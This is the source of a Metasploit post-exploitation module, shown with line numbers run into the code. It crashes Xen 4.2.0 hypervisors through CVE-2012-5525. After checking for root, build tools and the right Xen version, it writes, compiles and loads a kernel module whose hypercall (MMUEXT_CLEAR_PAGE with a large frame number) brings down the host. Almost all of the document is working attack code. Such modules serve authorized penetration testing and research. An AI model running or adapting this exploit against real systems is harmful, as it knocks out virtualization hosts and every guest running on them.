Path: blob/master/modules/post/linux/dos/xen_420_dos.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Linux::Priv8include Msf::Post::Linux::System910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Linux DoS Xen 4.2.0 2012-5525',15'Description' => %q{16This module causes a hypervisor crash in Xen 4.2.0 when invoked from a17paravirtualized VM, including from dom0. Successfully tested on Debian 7183.2.0-4-amd64 with Xen 4.2.0.19},20'References' => [ ['CVE', '2012-5525'] ],21'License' => MSF_LICENSE,22'Author' => [23'Christoph Sendner <christoph.sendner[at]stud-mail.uni-wuerzburg.de>',24'Aleksandar Milenkoski <aleksandar.milenkoski[at]uni-wuerzburg.de>'25],26'Platform' => [ 'linux' ],27'Arch' => [ARCH_X64],28'SessionTypes' => ['shell'],29'Notes' => {30'Stability' => [CRASH_SERVICE_DOWN],31'Reliability' => [],32'SideEffects' => [IOC_IN_LOGS]33}34)35)3637register_options([38OptString.new('WritableDir', [true, 'A directory for storing temporary files on the target system', '/tmp'])39])40end4142def run43# Variables44@rand_folder = '/' + Rex::Text.rand_text_alpha(7..11).to_s45@writeable_folder = datastore['WritableDir'].to_s + @rand_folder4647# Testing requirements48print_status('Detecting requirements...')49return unless requirements_met?5051# Cearting and writing random paths and files52vprint_status('Creating random file and folder names')53write_files5455# Execute make and insmod56do_insmod5758# Testing success of DoS59test_success60end6162##63# Test all requirements:64# - root-priviliges65# - build-essentials66# - xen-enviroment (existing, not running)67# - xen-running68# - xen-version (DoS only works on specific versions)69##7071def requirements_met?72unless is_root?73print_error('Root access is required')74return false75end76print_good('Detected root privilege')7778unless build_essential?79print_error('No build-essential package found')80return false81end82print_good('Detected build-essential')8384unless xen?85print_error('Running Xen was not found')86return false87end88print_good('Detected Xen')8990unless xen_running?91print_error('Xen is not running')92return false93end94print_good('Detected running Xen')9596unless right_xen_version?97print_error('Incorrect Xen version running')98return false99end100print_good('Detected correct Xen version')101102true103end104105##106# Checks for build essentials107# - Required for building a lkm108# - checks for gcc/g++, make and linux-headers109# - commands sh-conform110##111112def build_essential?113check_command = 'if [ -s $( which gcc ) ] && '114check_command << '[ -s $( which g++ ) ] && '115check_command << '[ -s $( which make ) ] && '116check_command << '[ "$( dpkg -l | grep linux-headers-$(uname -r) )" != "" ] ;'117check_command << 'then echo OK;'118check_command << 'fi'119120cmd_exec(check_command).delete("\r") == 'OK'121end122123##124# Checks for running Xen Hypervisor125# - Looks for Xen in lsmod, lscpu, dmesg and /sys/bus126# - commands sh-conform127##128129def xen?130check_command = 'if [ "$( lsmod | grep xen )" != "" ] || '131check_command << '[ "$( lscpu | grep Xen )" != "" ] || '132check_command << '[ "$( dmesg | grep xen )" != "" ] || '133check_command << '[ "$( which xl )" != "" ] ;'134check_command << 'then echo OK;'135check_command << 'fi'136137cmd_exec(check_command).delete("\r") == 'OK'138end139140##141# Checks for running Xen142# - Host eventually has Xen installed, but not running143# - DoS needs a running Xen on Host144##145146def xen_running?147check_command = 'if [ -f /var/run/xenstored.pid -o -f /var/run/xenstore.pid ] ; then echo OK; fi'148149cmd_exec(check_command).delete("\r") == 'OK'150end151152##153# Checks for Xen Version154# - Most DoS of Xen require a specific version - here: 4.2.0155# - commands need running Xen - so execute after test for xen156##157158def right_xen_version?159cmd_major = "xl info | grep xen_major | grep -o '[0-9]*'"160xen_major = cmd_exec(cmd_major).delete("\r")161cmd_minor = "xl info | grep xen_minor | grep -o '[0-9]*'"162xen_minor = cmd_exec(cmd_minor).delete("\r")163cmd_extra = "xl info | grep xen_extra | grep -o '[0-9]*'"164xen_extra = cmd_exec(cmd_extra).delete("\r")165166xen_version = xen_major + '.' + xen_minor + '.' + xen_extra167168print_status('Xen Version: ' + xen_version)169170xen_version == '4.2.0'171end172173##174# Creating and writing files:175# - c_file for c-code176# - Makefile177##178179def write_files180@c_name = Rex::Text.rand_text_alpha(7..11).to_s181@c_file = "#{@writeable_folder}/#{@c_name}.c"182@make_file = "#{@writeable_folder}/Makefile"183184vprint_status("Creating folder '#{@writeable_folder}'")185cmd_exec("mkdir #{@writeable_folder}")186187vprint_status("Writing C code to '#{@c_file}'")188write_file(@c_file, c_code)189vprint_status("Writing Makefile to '#{@make_file}'")190write_file(@make_file, make_code)191end192193##194# Compiling and execute LKM195##196197def do_insmod198cmd_exec("cd #{@writeable_folder}")199vprint_status('Making module...')200cmd_exec('make')201vprint_status("Insmod '#{@writeable_folder}/#{@c_name}.ko'")202cmd_exec("insmod #{@writeable_folder}/#{@c_name}.ko")203end204205##206# Test for success via ssh-error exception207# - Host down => ssh-error => DoS successful208##209210def test_success211successful = false212begin213is_root?214rescue RuntimeError => e215successful = true if e.message == 'Could not determine UID: ""'216raise unless successful217ensure218if successful219print_good('DoS was successful!')220else221print_error('DoS has failed')222end223end224end225226##227# Returns Makefile to compile228# - LKMs need a Makefile229# - Needs the linux-headers, make and gcc230##231232def make_code233m = <<~END234obj-m := #{@c_name}.o235236EXTRA_CFLAGS+= -save-temps237238all:239\t$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules240241clean:242\t$(MAKE) -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean243END244m245end246247##248# Returns the c-Code to compile249# - Contains the essential bug to crash Xen250# - Here: Force a segmentation fault via hypercall, which crashes the host251##252253def c_code254c = <<~END255#undef __KERNEL__256#define __KERNEL__257#undef MODULE258#define MODULE259#include <linux/module.h>260#include <asm/xen/hypercall.h>261MODULE_LICENSE("GPL");262static int __init lkm_init(void)263{264struct mmuext_op op;265int status;266op.cmd = 16; /*MMUEXT_CLEAR_PAGE*/267op.arg1.mfn = 0x0EEEEE; /*A large enough MFN*/268HYPERVISOR_mmuext_op(&op, 1, &status, DOMID_SELF);269return 0;270}271static void __exit lkm_cleanup(void)272{273}274module_init(lkm_init);275module_exit(lkm_cleanup);276END277c278end279end280281282